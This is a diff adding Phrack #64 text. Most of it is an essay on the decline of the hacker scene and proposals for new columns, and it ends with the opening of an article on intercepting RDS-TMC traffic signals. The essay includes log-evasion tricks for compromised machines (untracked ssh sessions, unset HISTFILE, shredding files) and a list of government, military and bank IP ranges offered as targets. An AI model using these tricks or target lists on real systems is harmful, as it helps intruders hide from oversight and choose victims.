+higher percentage of responses are along the lines of `you're an idiot,
+we at Phrack Staff are much smarter than you.`..."
+
+    And the reply:
+
+" - Trepidity <delirium4u@theoffspring.net> apparently still bitter at
+not being chosen as Mrs. Phrack 2000."
+
+    IMHO, Trepidity's remark was probably the best remark for a long long
+time.
+
+    Let's stop this little history course. I have showed you that I'm
+not alone in my reflection and that there is something wrong with the
+current disfunctional scene. Some people already thought this 10 years ago
+and I know that a lot of people are currently thinking exactly the same
+thing. The scene is dying and its spirit is flying away.
+
+    I'm not Erik Bloodaxe, I'm not Voyager or even Taran King ... I'm
+just me. But I would like to do something like 15 years ago, when the
+word hacking was still used in the noble sense. When the spirit was still
+there. We all need to react together or the beast will eat whats left
+of the spirit.
+
+
+----[ 3.3 The current zombie scene
+
+    "A dead scene whose body has been re-animated but whose the spirit
+is lacking".
+
+    I'm not really aware of every 'groups' in the world. Some people are
+much more connected than me. And to be honest, I knew the scene better 5
+years ago than I do now. But I will try to give you a snapshot of what
+the current scene is. Forgive me in advance for the groups that I will
+forget, it's really difficult to have an accurate snapshot. The best way
+to have a snapshot of the current scene is probably to use an algorithm
+like HITS which allow to detect a web community. But unfortunately I don't
+have time to implement it.
+
+    So the current scene for me is like a pyramid and it's organized
+like secret societies. I would like to split hackers groups in 3
+categories. In order to not give stupid names to these groups I will call 
+them layer 1 group, layer 2 group and layer 3 group. In the layer 1, 5 
+years ago, you had some really "famous" groups which were, I think, 
+composed of talented people. I will split this layer into two categories: 
+front-end groups and back-end groups. Some of the groups I called 
+front-end are: TESO, THC, w00w00, Phenoelit or Hert. Back-end groups 
+include ADM, Synergy, ElectronicSouls or Devhell. And you also have PHC 
+that you can include in both categories (you know guys you have your 
+entry in Wikipedia!). And at the top of that (but mainly at the top of 
+PHC) you had obscure/eleet groups like AB.
+
+   In the layer 2, I would like to include a lot of groups of less
+scale but I think which are trying to do good stuff. Generally, these 
+groups have no communication with layer 1 groups. These groups are: Toxyn,
+Blackhat.be, Netric, Felinemenace, S0ftpj (nice mag), Nettwerked 
+(congratulation for the skulls image guys!), Moloch, PacketWars, 
+Eleventh Alliance, Progenic, HackCanada, Blacksecurity, Blackclowns or 
+Aestetix. You can still split these groups into two categories, front-end 
+and back-end. Back-end are Toxyn or Blackat.be, others probably front-end.
+
+    Beside these groups, you have a lot of wannabe groups that I'd like to
+include in layer 3, composed of new generation of hackers. Some of these
+groups are probably good and I'm sure that some have the good hacking
+spirit, but generally these groups are composed of hackers who learned 
+hacking in a school or by reading hackers magazine that they find in 
+library. When you see a hacker arrested in a media, he generally comes 
+from one of these unknown groups. 20 years ago, cops arrested hackers 
+like Kevin Mitnick (The Condor), Nahshon Even-Chaim (Phoenix, The Realm), 
+Mark Abene (Phiber Optik, Legion of Doom) or John Lee (Corrupt, Master 
+of Deception), now they arrest Mafia Boy for a DDOS...
+
+    There are also some (dead) old school groups like cDc, Lopht or
+rhino9, independent skilled guys like Michal Zalewski or Silvio Cesare, 
+research groups like Lsd-pl and Darklab and obscure people like GOBBLES, 
+N3td3v or Fluffy Bunny :-) And of course, I don't forget people who are 
+not affiliated to any groups.
+
+    You can also find some central resources for hackers or phreackers
+like Packetstorm or Phreak.org, and magazine oriented resources like
+Pull the Plug or Uninformed.
+
+    In this wonderful world, you can find some self proclaimed eleet
+mailing list like ODD.
+
+    We can represent all these groups in a pyramid. Of course, this
+pyramid is not perfect. So don't blame me if you think that your groups
+is not in the good category, it's just a try.
+
+
+		       The Underground Pyramid
+				 _
+				/ \
+			       /   \
+			      /     \
+			     /	     \
+			    /	      \     <-- More eleet hackers in
+			   /   \   /   \	the world. Are you in?
+			  /    -(o)-	\
+			 /     /   \	 \
+			/		  \
+		       /		   \
+		      /_____________________\
+		     /			     \	<-- skilled hackers
+		    /	AB, Fluffy Bunny, ... \     hacking mainly 
+		   /___________________________\    for fun
+		  /	|	|	  |	\
+		 / PHC	| TESO	| ADM	  | cDc  \  <-- Generally
+		/  EL8	| THC	| Synergy | Lopht \	excellent skills 
+	       / GOBBLES| WOOWOO| Devhell | rhino9 \	some groups have
+	      /    ...	| ...	| ...	  | ....    \	the good spirit
+	     /_______________________________________\
+	    /			|		      \
+	   /	 Blackhat.be	|     HackCanada       \  <-- good skills,
+	  /	 Toxyn		|     Felinemenace	\     some are
+	 /	 ...    	|     Netric		 \    very
+	/	 		|     ...		  \   original
+       /___________________________________________________\
+      /							    \
+     /			  WANABEE GROUPS		     \ <-- newbies
+    /_________________________________________________________\
+   /							       \ <-- info
+  / Resources: 2600,Phrack, PacketStorm, Phreak.org, Uniformed, \    for
+ /				PTP, ...			 \   all
+/_________________________________________________________________\
+
+
+    All of these people make up the current scene. It's a big mixture
+between white/gray/black hats, where some people are white hat in the day
+and black hat at night (and vice-versa). Sometimes there are communication
+between them, sometimes not. I also have to say that it's generally the
+people from layer 1 groups who give talks to security conferences around
+the world...
+
+    It's really a shame that PHC is probably the best ambassador of the
+hacking spirit. Their initiative was great and really interesting.
+Moreover they are quite funny. But IMHO, they are probably a little too
+arrogant to be considered like an old spirit group.
+
+    Actually, the bad thing is that all these people are more or less
+separate and everyone is fighting everyone else. You can even find some
+hackers hacking other hackers! Where is the scene going? Even if you are
+technically very good, do you have to say to everyone that you are
+the best one and naming others as lamerz? The new hacker generation 
+will never understand the hacking spirit with this mentality.
+
+    Moreover the majority of hackers are completely disinterested by
+alternate interesting subjects addressed for example in 2600 magazine or 
+on Cryptome website. And this is really a shame because these two media 
+are publishing some really good information. Most hackers are only 
+interested by pure hacking techniques like backdooring, network 
+exploitation, client vulnerabilities... But for me hacking is closely 
+related to other subjects like those addressed on Cryptome website. For 
+example the majority of hackers don't know what SIPRnet is. There is only 
+one reference in Phrack, but there are several articles about SIPRnet in 
+2600 magazine or on Cryptome website. When I want to discuss about all 
+these interesting subjects it's really difficult to find someone in the 
+scene. And to be honest the only people that I can find are people away 
+from the scene. The majority of hackers composing the groups I mentioned 
+above are not interested by these subjects (as far as I know). Old school 
+hackers in 80's or 90's were more interested by alternated subjects than 
+the new generation.
+
+    In conclusion, firstly we have to get back the old school hacking
+spirit and afterwards explain to the new generation of hackers what it is.
+
+    It's the only way to survive. The scene is dying but I won't say
+that we can't do anything. We can do something. We must do something.
+It's our responsibility.
+
+
+--[ 4 Are security experts better than hackers?
+
+    STOP!!!!! I do not want to say that security experts are better than
+hackers. I don't think they are, but to be honest it's not really
+important. It's nonsense to ask who is better. The best guy, independent
+from the techniques he used, is always the most ingenious. But there
+are two points that I would like to develop.
+
+
+----[ 4.1 The beautiful world of corporate security
+
+    I met a really old school hacker some months ago, he told me something
+very pertinent and I think he was right. He told me that the technology
+has really changed these last years but that the old school tricks still
+work. Simply because the people working for security companies don't
+really care about security. They care more about finding a new eleet
+technique to attack or defend a system and presenting it to a security
+conference than to use it in practice.
+
+    So Underground, we have a problem. A major problem. 15 years ago,
+there were a lot of people working for the security industry. At times,
+there also were a lot of people working in what I will call the
+Underground scene. No-one can estimate the percentage in each camp, but
+I would say it was something like 60% working in security and 40% working
+in the Underground scene. It was still a good distribution. Nowadays, I'm
+not sure it's still true. A better estimation should be 80/20 orientated
+to security or maybe even worse... There are increasingly more and more
+people working for the security world than for the Underground scene. Look
+at all these "eleet" security companies like ISS, Core Security, Immunity,
+IDefense, eEye, @stake, NGSSoftware, Checkpoint (!), Counterpane, Sabre
+Security, Net-Square, Determina, SourceFire...I will stop here otherwise
+Google will make some publicity for these companies. All these security
+companies have hired and still hire some hackers, even if they will say
+that they don't. Sometimes, they don't even know they hired a hacker. How
+many past Phrack writers work for these companies? My guess is a lot,
+really a lot. After all, you can't stop a hacker if you have never been
+one...
+
+    You'll tell me: "that's normal, everyone has to eat". Yeah, that's
+true. Everyone has to eat. I'm not talking about that. What I don't like
+(even if we do need these good and bad guys) is all the stuff around the
+security world: conferences, (false) alerts, magazines, mailing lists,
+pseudo security companies, pseudo security websites, pseudo security
+books...
+
+    Can you tell me why there is so much security related stuff and not
+so much Underground related stuff?
+
+
+--[ 4.2 The in-depth knowledge of security conferences
+
+    If you have a look at all the topics addressed in a security
+conference, it's amazing. Take the most famous conferences: *Blackhat, 
+*SecWest or even Defcon (I mention only marketing conferences, there are
+others good conferences that are less corporate/business oriented like
+CCC, PH neutral, HOPE or WTH).  Now look at the talks given by the 
+speakers, they're really good. When I went to a security conference 5 
+years ago it was so funny, I was saying to my friends: "these guys are 
+5 years late". It was true then but I think it's not true anymore. They 
+are probably still late, but not as late as they were. But the most 
+relevant point for me is that recently there have been a lot of very 
+interesting subjects. OK not everything was interesting - there were 
+some shit subjects too. What I would consider as interesting subjects 
+are those related to new technologies (VOIP, WEB 2.0, RFID, BlackBerry, 
+GPS...) or original topics like hardware hacking, BlackOps, agency 
+relationships, SE story, bioinfo attack, nanotech, PsyOp... What the 
+Fuck ?!#@?! 10 years ago, all the original topics were released in an 
+Underground magazine like Phrack or 2600. Not in a security conference 
+where you have to pay more than $1000.
+
+    This is not my idea of what hacking should be. Do you really need
+publicity like this to feel good? This is not hacking. I'm not talking
+here about the core but the form. When I'm coding something at home all
+night and in the morning it works, it's really exciting. And I don't
+have to say to everyone "look at what I did!". Especially not in public
+where people have to pay more than $1000 to hear you.
+
+    Another incredible thing about these security conferences is what I
+would call the "conference circuit". Nowadays, if you are a security
+expert, the trend is to give the same talk at different security 
+conferences around the world. More than 50% of all security experts are 
+doing this. They go in America at BlackHat, Defcon and CanSecWest, after 
+they move in Europe and they finish in Asia or Australia. They can even 
+do BlackHat America, BlackHat Europe and BlackHat Asia! Like Roger
+Federer or Tiger Woods, they try to do the Grand Slam! So you can find 
+a conference given in 2007 which is more or less the same than one in 
+2005. Thus it seems we have now a new profession in our wonderful 
+security world: "conferences runner" !
+
+    Last funny thing is the number of conferences that I will include in
+the category "How to hack the system XXX". For example at the last
+Blackhat USA there was a conference on how to hack an embedded device, 
+for example printers and copiers. Despite the fact that it's interesting 
+(collecting document printed), what I find funny is the fact that you 
+just have to hack a non conventional device to be at Blackat or Defcon. 
+So, I will give some good advice to hackers who want to become famous: 
+try to hack the coffee machine used by the FBI or the embedded device 
+used by the lift of the Pentagon and everyone will see you as a hero 
+or a terrorist (thats context based).
+
+
+--[ 5. Phrack and the axis of counter-attack
+
+    Now that I have given you an overview of the security world, let's
+try to see how we can change it. There are two possibilities here. The
+first one is this:- I say to you "OK now that you really understand the
+problem, it's definitely time to change our mentality. This is the new
+mind set that we have to adopt". It's a little bit pretentious to say
+this though. Nobody can solve the problem alone and pretend to bring the
+good solution. So I guess that the first possibility won't work. People
+will agree but nobody will do anything.
+
+    The second possibility is to start with Phrack. All the people who
+make up The Circle of Lost Hackers agree that Phrack should come back to
+its past style when the spirit was present. We really agree with the quote
+above which said that Phrack is mainly a dry technical journal. It's
+why we would like to give you some idea that can bring back to Phrack its
+bygone aura. Phrack doesn't belong to a group a people, Phrack belongs to
+everyone, everyone in the Underground scene who want to bring something
+for the Underground. After all, Phrack is a magazine made by the community
+for the community.
+
+    We would like to invite everyone to give their point of view about the
+current scene and the orientation that Phrack should take in the future.
+We could compile a future article with all your ideas.
+
+
+----[ 5.1. Old idea, good idea
+
+    If you take a look at the old Phrack, there are some recurring
+articles :
+
+* Phrack LoopBack
+* Line noise
+* Phrack World News
+* Phrack Prophiles
+* International scenes
+
+    Here's something funny about Phrack World News, if you take a look
+at Phrack 36 it was not called "Phrack World News" but instead it was
+"Elite World News"...
+
+    So, all these articles were and are interesting. But in these
+articles, we would like to resuscitate the last one: "International 
+scenes". A first essay is made in this issue, but we would like people 
+to send us a short description of their scene. It could be very 
+interesting to have some descriptions of scenes that are not common, 
+for example the China scene, the Brazilian scene, the Russian scene, 
+the African scene, the Middle East scene... But of course we are also 
+interested in the more classic scenes like Americas, GB, France, Germany, 
+... Everything is welcome, but hackers all over the world are not only 
+hackers in Europe-Americas, we're everywhere. And when we talk about the 
+Underground scene, it should include all local scenes.
+
+
+----[ 5.2. Improving your hacking skills
+
+    Here we would like to start a new kind of article. An article whose
+purpose is to give to the new generation of hackers some different little
+tricks to hack "like an eleet". This article will be present in every
+new issue (at least until it's dead ... we hope not soon). The idea is
+to ask to everyone to send us their tricks when they hack something
+(it could be a computer or not). The tricks should be explained in no
+more than 30 lines, and it could even be one line. It could be an eleet
+trick or something really simple but useful. Example:
+
+
+An almost invisible ssh connection
+----------------------------------
+
+    In the worse case if you have to ssh on a box, do it every time
+with no tty allocation
+
+    ssh -T user@host
+
+    If you connect to a host with this way, a command like "w" will not
+show your connection. Better, add 'bash -i' at the end of the command to
+simulate a shell
+
+     ssh -T user@host /bin/bash -i
+
+    Another trick with ssh is to use the -o option which allow you to
+specify a particular know_hosts file (by default it's ~/.ssh/know_hosts).
+The trick is to use -o with /dev/null:
+
+    ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -i
+
+    With this trick the IP of the box you connect to won't be logged in
+know_hosts.
+
+    Using an alias is a good idea.
+
+
+Erasing a file
+--------------
+
+    In the case of you have to erase a file on a owned computer, try
+to use a tool like shred which is available on most of Linux.
+
+shred -n 31337 -z -u file_to_delete
+
+-n 31337 : overwrite 313337 times the content of the file
+-z : add a final overwrite with zeros to hide shredding
+-u : truncate and remove file after overwriting
+
+    A better idea is to do a small partition in RAM with tmpfs or
+ramdisk and storing all your files inside.
+
+    Again, using an alias is a good idea.
+
+
+The quick way to copy a file
+----------------------------
+
+    If you have to copy a file on a remote host, don't bore yourself with
+an FTP connection or similar. Do a simple copy and paste in your Xconsole.
+If the file is a binary, uuencode the file before transferring it.
+
+    A more eleet way is to use the program 'screen' which allows copying a
+file from one screen to another:
+
+    To start/stop :  C-a H or C-a : log
+
+    And when it's logging, just do a cat on the file you want to transfer.
+
+
+Changing your shell
+-------------------
+
+    The first thing you should do when you are on an owned computer is to
+change the shell. Generally, systems are configured to keep a history for
+only one shell (say bash), if you change the shell (say ksh), you won't be
+logged.
+
+    This will prevent you being logged in case you forget to clean
+the logs. Also, don't forget 'unset HISTFILE' which is often useful.
+
+
+    Some of these tricks are really stupid and for sure all old school
+hackers know them (or don't use them because they have more eleet tricks).
+But they are still useful in many cases and it should be interesting to
+compare everyone's tricks.
+
+
+----[ 5.3. The Underground yellow pages
+
+    Another interesting idea is to maintain a list of all the interesting
+IP ranges in the world. This article will be called "Meaningful IP
+ranges". We have already started to scan all the class A and B networks. 
+What is really interesting is all the IP addresses of agencies which are 
+supposed to spy us. Have a look at this site:
+
+http://www.milnet.com/iagency.htm
+
+    However we don't have to focus our list on agencies, but on everything
+which is supposed to be the power of the world.
+
+
+It includes:
+
+* All agencies of a country (China, Russia, UK, France, Israel...)
+
+* All companies in a domain, for example all companies related to private
+  secret service or competitive intelligence or financial clearing or
+  private army (dyncorp, CACI, MPRI, Vinnel, Wackenhut, ...)
+
+* Companies close to government (SAIC, Dassault, QinetiQ, Halliburton,
+  Bechtel...)
+
+* Spying business companies (AT&T, Verizon, VeriSign, AmDocs, BellSouth,
+  Top Layer Networks, Narus, Raytheon, Verint, Comverse, SS8, pen-link...)
+
+* Spoken Medias (Al Jazeera, Al Arabia, CNN, FOX, BBC, ABC, RTVi, ...)
+
+* Written Medias or press agencies (NY/LA Times, Washington Post,
+  Guardian, Le monde, El Pais, The Bild, The Herald, Reuters, AFP, AP, 
+  TASS, UPI...)
+
+* All satellite maintainers (Intelsat, Eurosat, Inmarsat, Eutelsat,
+  Astra...)
+
+* Suspect investment firms (Carlyle, In-Q-Tel...)
+
+* Advanced research centers (DARPA, ARDA/DTO, HAARP...)
+
+* Secret societies, fake groups and think-tanks (The Club of Rome, The
+  Club of Berne, Bilderberg, JASON group, Rachel foundation, CFR, ERT,
+  UNICE, AIPAC, The Bohemian Club, Opus Dei, The Chatman House, Church of
+  Scientology...)
+
+* Guerilla groups, rebels or simply alternative groups (FARC, ELN, ETA,
+  KKK, NPA, IRA, Hamas, Hezbolah, Muslim Brothers...)
+
+* Ministries (Defense, Energy, State, Justice...)
+
+* Militaries or international polices (US Army, US Navy, US Air Force,
+  NATO, European armies, Interpol, Europol, CCU...)
+
+* And last but not least: HONEYPOT!
+
+
+    It's obvious that not all ranges can be obtained. Some agencies are
+registered under a false name in order to be more discrete (what about
+ENISA, the European NSA?), others use some high level systems (VPN, tor
+...) on top of normal networks or simply use communication systems other
+than the Internet. But we would like to keep the most complete list we
+can. But for this we need your help. We need the help of everyone in
+the Underground who is ready to share knowledge. Send us your range.
+
+    We started to scan the A and B range with a little script we made,
+but be sure that the more interesting range are in class C. Here is a
+quick start of the list :
+
+11.0.0.0 - 11.255.255.255 : DoD Network Information Center
+144.233.0.0 - 144.233.255.255 : Defense Intelligence Agency
+144.234.0.0 - 144.234.255.255 : Defense Intelligence Agency
+144.236.0.0 - 144.236.255.255 : Defense Intelligence Agency
+144.237.0.0 - 144.237.255.255 : Defense Intelligence Agency
+144.238.0.0 - 144.238.255.255 : Defense Intelligence Agency
+144.239.0.0 - 144.239.255.255 : Defense Intelligence Agency
+144.240.0.0 - 144.240.255.255 : Defense Intelligence Agency
+144.241.0.0 - 144.241.255.255 : Defense Intelligence Agency
+144.242.0.0 - 144.242.255.255 : Defense Intelligence Agency
+162.45.0.0 - 162.45.255.255 : Central Intelligence Agency
+162.46.0.0 - 162.46.255.255 : Central Intelligence Agency
+130.16.0.0 - 130.16.255.255 : The Pentagon
+134.11.0.0 - 134.11.255.255 : The Pentagon
+134.152.0.0 - 134.152.255.255 : The Pentagon
+134.205.0.0 - 134.205.255.255 : The Pentagon
+140.185.0.0 - 140.185.255.255 : The Pentagon
+141.116.0.0 - 141.116.255.255 : Army Information Systems Command-Pentagon
+6.0.0.0 - 6.255.255.255 : DoD Network Information Center
+128.20.0.0 - 128.20.255.255 : U.S. Army Research Laboratory
+128.63.0.0 - 128.63.255.255 : U.S. Army Research Laboratory
+129.229.0.0 - 129.229.255.255 : United States Army Corps of Engineers
+131.218.0.0 - 131.218.255.255 : U.S. Army Research Laboratory
+134.194.0.0 - 134.194.255.255 : DoD Network Information Center
+134.232.0.0 - 134.232.255.255 : DoD Network Information Center
+137.128.0.0 - 137.128.255.255 : U.S. ARMY Tank-Automotive Command
+144.252.0.0 - 144.252.255.255 : DoD Network Information Center
+155.8.0.0 - 155.8.255.255 : DoD Network Information Center
+158.3.0.0 - 158.3.255.255 : Headquarters, USAAISC
+158.12.0.0 - 158.12.255.255 : U.S. Army Research Laboratory
+164.225.0.0 - 164.225.255.255 : DoD Network Information Center
+140.173.0.0 - 140.173.255.255 : DARPA ISTO
+158.63.0.0 - 158.63.255.255 : Defense Advanced Research Projects Agency
+145.237.0.0 - 145.237.255.255 : POLFIN ( Ministry of Finance Poland)
+163.13.0.0 - 163.32.255.255 : Ministry of Education Computer Center Taiwan
+168.187.0.0 - 168.187.255.255 : Kuwait Ministry of Communications
+171.19.0.0 - 171.19.255.255 : Ministry of Interior Hungary
+164.49.0.0 - 164.49.255.255 : United States Army Space and Strategic
+Defense
+165.27.0.0 - 165.27.255.255 : United States Cellular Telephone
+152.152.0.0 - 152.152.255.255 : NATO Headquarters
+128.102.0.0 - 128.102.255.255 : NASA
+128.149.0.0 - 128.149.255.255 : NASA
+128.154.0.0 - 128.154.255.255 : NASA
+128.155.0.0 - 128.155.255.255 : NASA
+128.156.0.0 - 128.156.255.255 : NASA
+128.157.0.0 - 128.157.255.255 : NASA
+128.158.0.0 - 128.158.255.255 : NASA
+128.159.0.0 - 128.159.255.255 : NASA
+128.161.0.0 - 128.161.255.255 : NASA
+128.183.0.0 - 128.183.255.255 : NASA
+128.217.0.0 - 128.217.255.255 : NASA
+129.50.0.0 - 129.50.255.255 : NASA
+153.31.0.0 - 153.31.255.255 : FBI Criminal Justice Information Systems
+138.137.0.0 - 138.137.255.255 : Navy Regional Data Automation Center
+138.141.0.0 - 138.141.255.255 : Navy Regional Data Automation Center
+138.143.0.0 - 138.143.255.255 : Navy Regional Data Automation Center
+161.104.0.0 - 161.104.255.255 : France Telecom R&D
+161.105.0.0 - 161.105.255.255 : France Telecom R&D
+161.106.0.0 - 161.106.255.255 : France Telecom R&D
+159.217.0.0 - 159.217.255.255 : Alcanet International (Alcatel)
+158.190.0.0 - 158.190.255.255 : Credit Agricole
+158.191.0.0 - 158.191.255.255 : Credit Agricole
+158.192.0.0 - 158.192.255.255 : Credit Agricole
+165.32.0.0 - 165.48.255.255 : Bank of America
+171.128.0.0 - 171.206.255.255 : Bank of America
+167.84.0.0 - 167.84.255.255 : The Chase Manhattan Bank
+159.50.0.0 - 159.50.255.255 : Banque Nationale de Paris
+159.22.0.0 - 159.22.255.255 : Swiss Federal Military Dept.
+163.12.0.0 - 163.12.255.255 : navy aviation supply office
+163.249.0.0 - 163.249.255.255 : Commanding Officer Navy Ships Parts
+164.94.0.0 - 164.94.255.255 : Navy Personnel Research
+164.224.0.0 - 164.224.255.255 : Secretary of the Navy
+34.0.0.0 - 34.255.255.255 : Halliburton Company
+139.121.0.0 - 139.121.255.255 : Science Applications International
+Corporation
+...
+
+    The last one is definitely interesting; people interested by obscure
+technologies should investigate in-depth SAIC stuff...
+
+    But anyway this list is rough and incomplete. We have a lot more
+interesting ranges but not yet classed. It's just to show you how easy
+it is to obtain.
+
+    If you think that the idea is funny, send us your range. We would be
+pleased to include your range in our list. The idea is to offer the more
+complete list we can for the next Phrack release.
+
+
+----[ 5.4. The axis of knowledge
+
+    I'm sure that everyone knows "the axis of evil". This sensational
+expression was coined some years ago by Mr. Bush to group wicked
+countries (but was it really invented by the "president" or by m1st3r
+Karl Rove??). We could use the same expression to name the evil subjects
+that we would like to have in Phrack. But I will leave to Mr Powerful
+Bush his expression and find a more noble one : The Axis of Knowledge.
+
+    So what is it about? Just list some topics that we would like to find
+more often in Phrack. In the past years, Phrack was mainly focused on
+exploitation, shellcode, kernel and reverse engineering. I'm not saying
+that this was not interesting, I'm saying that we need to diversify the
+articles of Phrack. Everyone agrees that we must know the advances in
+heap exploitation but we should also know how to exploit new technologies.
+
+
+------[ 5.4.1 New Technologies
+
+    To illustrate my point, we can take a quote from Phrack 62, the
+profiling of Scut:
+
+
+Q: What suggestions do you have for Phrack?
+
+A:  For the article topics, I personally would like to see more articles
+on upcoming technologies to exploit, such as SOAP, web services,
+.NET, etc.
+
+
+    We think he was right. We need more article on upcoming technology.
+Hackers have to stay up to date. Low level hacking is interesting but we
+also need to adapt ourselves to new technologies.
+
+    It could include: RFID, Web2, GPS, Galileo, GSM, UMTS, Grid Computing,
+Smartdust system.
+
+    Also, since the name Phrack is a combination between Phreack and Hack,
+having more articles related to Phreacking would be great. If you have
+a look to all the Phrack issues from 1 to 30, the majority of articles 
+talked about Phreacking. And Phreacking and new technologies are closely 
+connected.
+
+
+------[ 5.4.2 Hidden and private networks
+
+    We would like to have a detailed or at least an introduction to
+private networks used by governments. It includes:
+
+* Cyber Security Knowledge Transfer Network (KTN)
+	http://ktn.globalwatchonline.com
+
+* Unclassified but Sensitive Internet Protocol Router Network
+   and
+  The Secret IP Router Network (SIPRN)
+	http://www.disa.mil/main/prodsol/data.html
+
+* GOVNET
+	http://www.govnet.state.vt.us/
+
+* Advanced Technology Demonstration Network
+	http://www.atd.net/
+
+* Global Information Grid (GIG)
+	http://www.nsa.gov/ia/industry/gig.cfm?MenuID=10.3.2.2
+...
+
+    There are a lot private networks in the world and some are not
+documented. What we want to know is: how they are implemented, who
+is using them, which protocols are being used (is it ATM, SONET...?),
+is there a way to access them through the Internet, ....
+
+    If you have any information to share on these networks, we would be
+very interested to hear from you.
+
+
+------[ 5.4.3 Information warfare
+
+    Information warfare is probably one of the most interesting upcoming
+subjects in recent years. Information is present everywhere and the one
+who controls the information will be the master. USA already understands
+this well, China too, but some countries are still late. Especially in
+Europe. Some websites are already specialized in information warfare
+like IWS the Information Warfare Site (http://www.iwar.org.uk)
+
+    You can also find some schools across the world which are specialized
+in information warfare.
+
+    We, hackers, can use our knowledge and ingeniousness to do something
+in this domain. Let me give you two examples. The first one is Black Hat
+SEO (http://www.blackhatseo.com/). This subject is really interesting
+because it combines a lot of subjects like development, hacking,
+social engineering, linguistics, artificial intelligence and even
+marketing. These techniques can be use in Information Warfare and we
+would like the Underground to know more about this subject.
+
+    Second example, in a document entitled "Who is n3td3v?" the author
+(hacker factor) use linguistic techniques in order to identify
+n3td3v. After having analyzed n3td3v's text, the author claims that 
+n3td3v and Gobbles are probably the same person. N3td3v's answer was 
+to say that he has an A.I. program allowing him to generate a text 
+automatically. If he wants to sound like George Bush, he has simply 
+to find a lots of articles by him, give these texts to his A.I. and 
+the AI program will build a model representing the way that George 
+Bush write. Once the model created, he can give a text to the A.I. 
+and this text will be translated in "George Bush Speaking". Author's 
+answer (hacker factor) was to say it's not possible.
+
+    For working in text-mining, I can tell you that it's possible. The
+majority of people working in the academic area are blind and when you
+come to them with innovative techniques, they generally say you that you
+are a dreamer. A simple implementation can be realized quickly with the
+use of a grammar (that you can even induct automatically), a thesaurus
+and markov chains. Add some home made rules and you can have a small
+system to modify a text.
+
+    An idea could be to release a tool like this (the binary, not the
+source). I already have the title for an article : "Defeating forensic:
+how to cover your says" !
+
+    More generally, in information warfare, interesting subjects could be:
+
+* Innovative information retrieval techniques
+* Automatic diffusion of manipulated information
+* Tracking of manipulated information
+
+    Military and advanced centers like DARPA are already interested in
+these topics. We don't have to let governments have the monopoly on
+these areas. I'm sure we can do much better than governments.
+
+
+------[ 5.4.4 Spying System
+
+    Everyone knows ECHELON, it's probably the most documented spying
+system in the world. Unfortunately, the majority of the information that
+you can find on ECHELON is where ECHELON bases in the world are. There is
+nothing about how they manipulate data. It's evident that they are using
+some data-mining techniques like speech recognition, text-cleaning, topic
+classification, name entity recognition sentiment detection and so on. For
+this they could use their own software or maybe they are using some
+commercial software like:
+
+
+Retrievalware from Convera :
+	http://www.convera.com/solutions/retrievalware/Default.aspx
+
+Inxight's products:
+	 http://www.inxight.com/products/
+
+"Minority Report" like system visualization:
+	http://starlight.pnl.gov/
+
+...
+
+    For now we are like Socrates, all we know is that we know nothing.
+Nothing about how they process data. But we are very interested to know.
+
+    In the same vein, we would like to know more on Narus
+(http://www.narus.com/), which could be used as the successor of 
+CARNIVORE which was the FBI's tools to intercept electronic data. Which 
+countries use Narus, where it is installed, how is Narus processing 
+information...
+
+    Actually any system which is supposed to spy on us is interesting.
+
+
+--[ 6. Conclusion
+
+    I'm reaching the end of my subject. Like with every articles some
+people will agree with the content and some not. I'm probably not the best
+person for talking about the Underground but I tried to resume in
+this text all the interesting discussions I had for several years with a 
+lot of people. I tried to analyze the past and present scene and to give 
+you a snapshot as accurate as possible.
+
+    I'm not entirely satisfied, there's a lot more to say. But if this
+article can already make you thinking about the current scene or
+the Underground in general, that means that we are on the good way.
+
+    The most important thing to retain is the need to get back the
+Underground spirit. The world changes, people change, the security world
+changes but the Underground has to keep its spirit, the spirit which
+characterized it in the past.
+
+    I gave you some ideas about how we could do it, but there are much
+more ideas in 10000 heads than in one. Anyone who worry about the current
+scene is invited to give his opinion about how we could do it.
+
+    So let's go for the wakeup of the Underground. THE wakeup. A wakeup
+to show to the world that the Underground is not dead. That it will never
+die, that it is still alive and for a long time.
+
+    Thats the responsibility of all hackers around the world.
+
+
+
diff --git a/phrack64/5.txt b/phrack64/5.txt
new file mode 100644
index 0000000..a9d6038
--- /dev/null
+++ b/phrack64/5.txt
@@ -0,0 +1,3213 @@
+              _                                                _
+            _/B\_                                            _/W\_
+            (* *)             Phrack #64 file 5              (* *)
+            | - |                                            | - |
+            |   |     Hijacking RDS-TMC Traffic Information  |   |
+            |   |                   signals                  |   |
+            |   |                                            |   |
+            |   |       by Andrea "lcars" Barisani           |   |
+            |   |            <lcars@inversepath.com>         |   |                              
+            |   |          Daniele "danbia" Bianco           |   |
+            |   |            <danbia@inversepath.com>        |   |
+            (____________________________________________________)
+
+
+--[ Contents
+
+1. - Introduction
+2. - Motivation
+3. - RDS
+4. - RDS-TMC
+2. - Sniffing circuitry
+4. - Simple RDS Decoder v0.1 
+5. - Links
+
+
+--[ 1. Introduction
+
+Modern Satellite Navigation systems use a recently developed standard
+called RDS-TMC (Radio Data System - Traffic Message Channel) for receiving
+traffic information over FM broadcast. The protocol allows communication of
+traffic events such as accidents and queues. If information affects the
+current route plotted by the user the information is used for calculating
+and suggesting detours and alternate routes. We are going to show how to
+receive and decode RDS-TMC packets using cheap homemade hardware, the goal
+is understanding the protocol so that eventually we may show how trivial it
+is to inject false information.
+
+We also include the first release of our Simple RDS Decoder (srdsd is the
+lazy name) which as far as we know is the first open source tool available
+which tries to fully decode RDS-TMC messages. It's not restricted to
+RDS-TMC since it also performs basic decoding of RDS messages.
+
+The second part of the article will cover transmission of RDS-TMC messages,
+satellite navigator hacking via TMC and its impact for social engineering
+attacks.
+
+
+--[ 2. Motivation
+
+RDS has primarily been used for displaying broadcasting station names on FM
+radios and give alternate frequencies, there has been little value other
+than pure research and fun in hijacking it to display custom messages.
+
+However, with the recent introduction of RDS-TMC throughout Europe we are
+seeing valuable data being transmitted over FM that actively affects SatNav
+operations and eventually the driver's route choice. This can
+have very important social engineering consequences. Additionally, RDS-TMC
+messages can be an attack vector against SatNav parsing capabilities.
+
+Considering the increasing importance of these system's role in car
+operation (which are no longer strictly limited to route plotting anymore)
+and their human interaction they represent an interesting target combined
+with the "cleartext" and un-authenticated nature of RDS/RDS-TMC messages.
+
+We'll explore the security aspects in Part II.
+
+
+--[ 3. RDS
+
+The Radio Data System standard is widely adopted on pretty much every
+modern FM radio, 99.9% of all car FM radio models feature RDS nowadays.
+The standard is used for transmitting data over FM broadcasts and RDS-TMC
+is a subset of the type of messages it can handle. The RDS standard is
+described in the European Standard 50067.
+
+The most recognizable data transmitted over RDS is the station name which
+is often shown on your radio display, other information include alternate
